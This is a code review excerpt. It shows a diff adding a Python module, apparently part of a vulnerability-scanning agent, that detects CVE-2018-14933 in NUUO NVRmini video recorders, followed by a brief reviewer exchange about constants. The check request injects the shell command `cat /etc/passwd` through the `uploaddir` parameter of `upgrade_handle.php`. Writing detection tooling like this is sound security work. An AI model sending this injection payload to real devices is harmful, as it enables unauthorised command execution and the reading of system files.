agent/exploits/cve_2018_14933.py

```diff
@@ -0,0 +1,39 @@
+"""Agent implementation for CVE-2018-14933"""
+
+import re
+
+from agent import definitions
+from agent import exploits_registry
+from agent.exploits import webexploit
+
+VULNERABILITY_TITLE = "Remote Command Execution in NUUO NVRmini devices"
+VULNERABILITY_REFERENCE = "CVE-2018-14933"
+VULNERABILITY_DESCRIPTION = (
+    "The `upgrade_handle.php` endpoint on NUUO NVRmini devices is vulnerable to remote command execution. "
+    "This flaw exists due to improper sanitization of shell metacharacters in the `uploaddir` parameter when "
+    "handling a `writeuploaddir` command."
+)
+RISK_RATING = "CRITICAL"
+
+
+@exploits_registry.register
+class CVE201814933Exploit(webexploit.WebExploit):
+    accept_request = definitions.Request(
+        method="GET",
+        path="/",
+    )
+
+    accept_pattern = [re.compile(r"<title>NUUO Network Video Recorder")]
+    check_request = definitions.Request(
+        method="GET",
+        path="/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27",
```

Comment:
also this could be in a const

Reply:
Yeh but I only use it here so no need for it really